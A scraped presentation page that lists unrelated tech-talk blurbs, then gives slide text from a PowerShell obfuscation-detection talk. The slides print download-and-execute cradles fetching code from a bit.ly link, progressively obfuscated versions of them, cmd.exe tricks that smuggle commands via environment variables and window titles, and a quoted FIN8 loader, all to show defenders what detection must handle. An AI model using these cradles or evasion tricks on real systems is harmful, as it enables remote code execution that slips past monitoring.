Slides from presentation: "Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science" originally released at Black Hat USA 2017 & DEF CON by @danielhbohannon and @Lee_Holmes.
For more information: http://www.danielbohannon.com/presentations/
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
Slides from presentation: "PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell" presented at PSConfEU in Hanover, Germany.
For more information: http://www.danielbohannon.com/presentations/
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
--- Daniel Bohannon
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breach occur. He also develops new methods for detecting malicious PowerShell usage at both the host- and network-level while researching obfuscation techniques for PowerShell- based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Linux Performance Analysis: New Tools and Old SecretsBrendan Gregg
Talk for USENIX/LISA2014 by Brendan Gregg, Netflix. At Netflix performance is crucial, and we use many high to low level tools to analyze our stack in different ways. In this talk, I will introduce new system observability tools we are using at Netflix, which I've ported from my DTraceToolkit, and are intended for our Linux 3.2 cloud instances. These show that Linux can do more than you may think, by using creative hacks and workarounds with existing kernel features (ftrace, perf_events). While these are solving issues on current versions of Linux, I'll also briefly summarize the future in this space: eBPF, ktap, SystemTap, sysdig, etc.
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
Slides from presentation: "PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell" presented at PSConfEU in Hanover, Germany.
For more information: http://www.danielbohannon.com/presentations/
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...CODE BLUE
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
--- Daniel Bohannon
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breach occur. He also develops new methods for detecting malicious PowerShell usage at both the host- and network-level while researching obfuscation techniques for PowerShell- based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Linux Performance Analysis: New Tools and Old SecretsBrendan Gregg
Talk for USENIX/LISA2014 by Brendan Gregg, Netflix. At Netflix performance is crucial, and we use many high to low level tools to analyze our stack in different ways. In this talk, I will introduce new system observability tools we are using at Netflix, which I've ported from my DTraceToolkit, and are intended for our Linux 3.2 cloud instances. These show that Linux can do more than you may think, by using creative hacks and workarounds with existing kernel features (ftrace, perf_events). While these are solving issues on current versions of Linux, I'll also briefly summarize the future in this space: eBPF, ktap, SystemTap, sysdig, etc.
This presentation done at DeepSec 2014 focuses on using PowerShell for Client Side attacks. New scripts which are part of the open-source toolkit Nishang were also released. NIshang is toolkit in PowerShell for Penetration Testing
This presentation will provide a high level overview of the current role that desktop applications play in enterprise environments, and the general risks associated with different deployment models. It will also cover common methodologies, techniques, and tools used to identify vulnerabilities in typical desktop application implementations. Although there will be some technical content. The discussion should be interesting and accessible to both operational and management levels.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...Pierre-jean Texier
Longtemps basées sur des solutions "maison", il existe maintenant grâce à l'évolution du marché de "l'IoT", des solutions open source pour répondre à la complexité qu'est la gestion des mises à jour sur un système Linux Embarqué. Cette conférence commencera par présenter les différentes problématiques liées aux mises à jour dans un tel environnement : - accès physique, - sécurité, - downtime, - les composants à mettre à jour, - les différentes stratégies, - ...
Thick Client Penetration Testing
You will learn how to do pentesting of Thick client applications on a local and network level, You will also learn how to analyze the internal communication between web services & API.
Everyone heard about Kubernetes. Everyone wants to use this tool. However, sometimes we forget about security, which is essential throughout the container lifecycle.
Therefore, our journey with Kubernetes security should begin in the build stage when writing the code becomes the container image.
Kubernetes provides innate security advantages, and together with solid container protection, it will be invincible.
During the sessions, we will review all those features and highlight which are mandatory to use. We will discuss the main vulnerabilities which may cause compromising your system.
Contacts:
LinkedIn - https://www.linkedin.com/in/vshynkar/
GitHub - https://github.com/sqerison
-------------------------------------------------------------------------------------
Materials from the video:
The policies and docker files examples:
https://gist.github.com/sqerison/43365e30ee62298d9757deeab7643a90
The repo with the helm chart used in a demo:
https://github.com/sqerison/argo-rollouts-demo
Tools that showed in the last section:
https://github.com/armosec/kubescape
https://github.com/aquasecurity/kube-bench
https://github.com/controlplaneio/kubectl-kubesec
https://github.com/Shopify/kubeaudit#installation
https://github.com/eldadru/ksniff
Further learning.
A book released by CISA (Cybersecurity and Infrastructure Security Agency):
https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
O`REILLY Kubernetes Security:
https://kubernetes-security.info/
O`REILLY Container Security:
https://info.aquasec.com/container-security-book
Thanks for watching!
Kubernetes와 Kubernetes on OpenStack 환경의 비교와 그 구축방법에 대해서 알아봅니다.
1. 클라우드 동향
2. Kubernetes vs Kubernetes on OpenStack
3. Kubernetes on OpenStack 구축 방벙
4. Kubernetes on OpenStack 운영 방법
사내 발표자료 겸 만들었는데, ECS Fargate를 이용하실 분들이라면, 편리하게 쓰실 수 있도록 최대한 상세하게 만들어 보았습니다.
사실 CloudFormation 등 배포는 좀 더 편리하게 할 수 있지만, 회사 사정도 있고, 제가 일단 그런 기술을 너무 늦게 알았기 때문에 다루지는 않았습니다.
This workshop is a hands-on training where a real Zend Framework application is used as an example to start improving QA using tools to test, document and perform software metric calculations to indicate where the software can be improved. I also explain the reports produced by a CI system.
This presentation done at DeepSec 2014 focuses on using PowerShell for Client Side attacks. New scripts which are part of the open-source toolkit Nishang were also released. NIshang is toolkit in PowerShell for Penetration Testing
This presentation will provide a high level overview of the current role that desktop applications play in enterprise environments, and the general risks associated with different deployment models. It will also cover common methodologies, techniques, and tools used to identify vulnerabilities in typical desktop application implementations. Although there will be some technical content. The discussion should be interesting and accessible to both operational and management levels.
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Mises à jour logicielles en environnement Linux Embarqué, petit guide et tour...Pierre-jean Texier
Longtemps basées sur des solutions "maison", il existe maintenant grâce à l'évolution du marché de "l'IoT", des solutions open source pour répondre à la complexité qu'est la gestion des mises à jour sur un système Linux Embarqué. Cette conférence commencera par présenter les différentes problématiques liées aux mises à jour dans un tel environnement : - accès physique, - sécurité, - downtime, - les composants à mettre à jour, - les différentes stratégies, - ...
Thick Client Penetration Testing
You will learn how to do pentesting of Thick client applications on a local and network level, You will also learn how to analyze the internal communication between web services & API.
Everyone heard about Kubernetes. Everyone wants to use this tool. However, sometimes we forget about security, which is essential throughout the container lifecycle.
Therefore, our journey with Kubernetes security should begin in the build stage when writing the code becomes the container image.
Kubernetes provides innate security advantages, and together with solid container protection, it will be invincible.
During the sessions, we will review all those features and highlight which are mandatory to use. We will discuss the main vulnerabilities which may cause compromising your system.
Contacts:
LinkedIn - https://www.linkedin.com/in/vshynkar/
GitHub - https://github.com/sqerison
-------------------------------------------------------------------------------------
Materials from the video:
The policies and docker files examples:
https://gist.github.com/sqerison/43365e30ee62298d9757deeab7643a90
The repo with the helm chart used in a demo:
https://github.com/sqerison/argo-rollouts-demo
Tools that showed in the last section:
https://github.com/armosec/kubescape
https://github.com/aquasecurity/kube-bench
https://github.com/controlplaneio/kubectl-kubesec
https://github.com/Shopify/kubeaudit#installation
https://github.com/eldadru/ksniff
Further learning.
A book released by CISA (Cybersecurity and Infrastructure Security Agency):
https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
O`REILLY Kubernetes Security:
https://kubernetes-security.info/
O`REILLY Container Security:
https://info.aquasec.com/container-security-book
Thanks for watching!
Kubernetes와 Kubernetes on OpenStack 환경의 비교와 그 구축방법에 대해서 알아봅니다.
1. 클라우드 동향
2. Kubernetes vs Kubernetes on OpenStack
3. Kubernetes on OpenStack 구축 방벙
4. Kubernetes on OpenStack 운영 방법
사내 발표자료 겸 만들었는데, ECS Fargate를 이용하실 분들이라면, 편리하게 쓰실 수 있도록 최대한 상세하게 만들어 보았습니다.
사실 CloudFormation 등 배포는 좀 더 편리하게 할 수 있지만, 회사 사정도 있고, 제가 일단 그런 기술을 너무 늦게 알았기 때문에 다루지는 않았습니다.
This workshop is a hands-on training where a real Zend Framework application is used as an example to start improving QA using tools to test, document and perform software metric calculations to indicate where the software can be improved. I also explain the reports produced by a CI system.
Given at zendcon 2008 - my very first conference talk. And I did it way too fast. A lot of the information about these extensions is surprisingly relevant.
Burn down the silos! Helping dev and ops gel on high availability websitesLindsay Holmwood
HA websites are where the rubber meets the road - at 200km/h. Traditional separation of dev and ops just doesn't cut it.
Everything is related to everything. Code relies on performant and resilient infrastructure, but highly performant infrastructure will only get a poorly written application so far. Worse still, root cause analysis in HA sites will more often than not identify problems that don't clearly belong to either devs or ops.
The two options are collaborate or die.
This talk will introduce 3 core principles for improving collaboration between operations and development teams: consistency, repeatability, and visibility. These principles will be investigated with real world case studies and associated technologies audience members can start using now. In particular, there will be a focus on:
- fast provisioning of test environments with configuration management
- reliable and repeatable automated deployments
- application and infrastructure visibility with statistics collection, logging, and visualisation
SaltConf14 - Ben Cane - Using SaltStack in High Availability EnvironmentsSaltStack
An overview on the benefits and best practices of using SaltStack for consistency and automation in highly available enterprise environments such as financial services.
From zero to hero - Easy log centralization with Logstash and ElasticsearchRafał Kuć
Presentation I gave during DevOps Days Warsaw 2014 about combining Elasticsearch, Logstash and Kibana together or use our Logsene solution instead of Elasticsearch.
From Zero to Hero - Centralized Logging with Logstash & ElasticsearchSematext Group, Inc.
Originally presented at DevOpsDays Warsaw 2014. How to set up centralized logging either using ELK stack - Logstash, Elasticsearch, and Kibana or using Logsene.
Automatisation in development and testing - within budgetDavid Lukac
Working on client projects with very strict budget and resource restrictions, tight deadlines and pressure, many times does not allow for full blown Test Driven Development, Continuous Delivery and other software engineering goodness we would love to have. We will show you easily accessible and quickly implementable options, that allow you to automate your development and testing process, or at least the most painful parts, without blowing the budget. Finally you can relax during deployments of the code to production! :-)
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
Slides from presentation: $SignaturesAreDead = "Long Live RESILIENT Signatures" wide ascii nocase originally released at SANS DFIR Summit 2018.
For more information: http://www.danielbohannon.com/presentations/
Slides from presentation: "Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation)" originally released at Black Hat Asia 2018 in Singapore.
For more information: http://www.danielbohannon.com/presentations/
Slides from presentation: "DevSec Defense: How DevOps Practices Can Drive Detection Development For Defenders"
For more information: http://www.danielbohannon.com/presentations/
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
3. > Whois
0.0/00
- Lee Holmes
- Lead security architect of Azure Management @ MS
- Author of the Windows PowerShell Cookbook
- Original member of PowerShell Development Team
- @Lee_Holmes
Title . @Speaker . Location
iex (iwr bit.ly/e0Mw9w)
5. Preparing Your Environment for Investigations
• Logs (and retention) are your friend → 1) enable 2) centralize 3) LOOK/MONITOR
• Process Auditing AND Command Line Process Auditing → 4688 FTW!
• https://technet.microsoft.com/en-us/library/dn535776.aspx
• SysInternals’ Sysmon is also a solid option
• Real-time Process Monitoring
• Uproot IDS - https://github.com/Invoke-IR/Uproot
• PowerShell Module, ScriptBlock, and Transcription logging
• https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
• https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
8. Launch Techniques
• powershell.exe called by cmd.exe
• cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"
9. Launch Techniques
• powershell.exe called by cmd.exe
..
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"
10. Launch Techniques
• powershell.exe called by cmd.exe
..
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"
11. Launch Techniques
• powershell.exe called by cmd.exe
..
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"
Is it safe to key off of cmd.exe with arguments | powershell ??
Of course not! "powershell" can be set and called as variables in cmd.exe
cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|
%p1%%p2% - "
12. Launch Techniques
Here is an example of FIN8 combining this environment variable obfuscation with
PowerShell stdin invocation
cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE%
powershell -
$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o)
13. Launch Techniques
Here is an example of FIN8 combining this environment variable obfuscation with
PowerShell stdin invocation
cmd.exe /c echo %var1% | %var2%
cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE%
powershell -
powershell -
$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o)
14. Launch Techniques
• powershell.exe called by cmd.exe
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
• cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"
• cmd.exe /c "set cmd=Write-Host ENV -Fore Green && powershell IEX $env:cmd"
Can also use .Net function or GCI/dir:
[Environment]::GetEnvironmentVariable('cmd', 'Process')
(Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value
Kovter <3 this!
23. Launch Techniques
• cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && cmd /c echo %cmd%
^| powershell -"
• cmd /c echo %cmd% | powershell -
• powershell -
• Detect by recursively checking parent process command arguments?
Not 100% of the time
24. Launch Techniques
• Set content in one process and then query it out and execute it from another
completely separate process. NO SHARED PARENT PROCESS!
• cmd /c "title WINDOWS_DEFENDER_UPDATE && echo IEX (IWR
https://bit.ly/L3g1t)&& FOR /L %i IN (1,1,1000) DO echo"
• cmd /c "powershell IEX (Get-WmiObject Win32_Process -Filter ^"Name =
'cmd.exe' AND CommandLine like
'%WINDOWS_DEFENDER_UPDATE%'^").CommandLine.Split([char]38)[2].SubStri
ng(5)"
25. Launch Techniques
• The good news? PowerShell script block logs capture ALL of this.
• The bad news? Token-layer obfuscation persists into script block logs.
28. Obfuscating the Cradle: (New-Object Net.WebClient)
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
29. Obfuscating the Cradle
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
30. Obfuscating the Cradle
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
31. Obfuscating the Cradle
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• System.Net.WebClient
32. Obfuscating the Cradle
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• System.Net.WebClient
• ).DownloadString("http
33. Obfuscating the Cradle
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• System.Net.WebClient
• ).DownloadString("http
• Now let's demonstrate why assumptions are dangerous!
34. Obfuscating the Cradle
• Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• System.Net.WebClient (System.* is not necessary for .Net functions)
• ).DownloadString("http
35. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString("http
36. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString("https://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString("http (url is a string and can be concatenated)
37. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tps://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString("http (url is a string and can be concatenated)
38. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tps://bit.ly/L3g1t")
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString("
39. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString(" (PowerShell string can be single or double quotes)
(…and did I mention whitespace?)
(…URL can also be set as variable.)
40. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString(
41. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString( (is .DownloadString the only method for Net.WebClient?)
42. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).DownloadString(
Net.WebClient class has options:
• .DownloadString
• .DownloadStringAsync
• .DownloadStringTaskAsync
• .DownloadFile
• .DownloadFileAsync
• .DownloadFileTaskAsync
• .DownloadData
• .DownloadDataAsync
• .DownloadDataTaskAsync
• etc.
43. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).Download
44. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).Download
45. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• ).Download
(New-Object Net.WebClient) can be set as a variable:
$wc = New-Object Net.Webclient;
$wc.DownloadString( 'ht'+'tps://bit.ly/L3g1t')
46. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• .Download
47. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).DownloadString( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• .Download (Member token obfuscation?)
48. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient).'DownloadString'( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• .Download (single quotes…)
49. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."DownloadString"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• .Download (double quotes…)
50. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."Down`loadString"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download (tick marks??)
51. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."Down`loadString"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download
Get-Help about_Escape_Characters
52. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download
Get-Help about_Escape_Characters
53. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download
Get-Help about_Escape_Characters
54. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
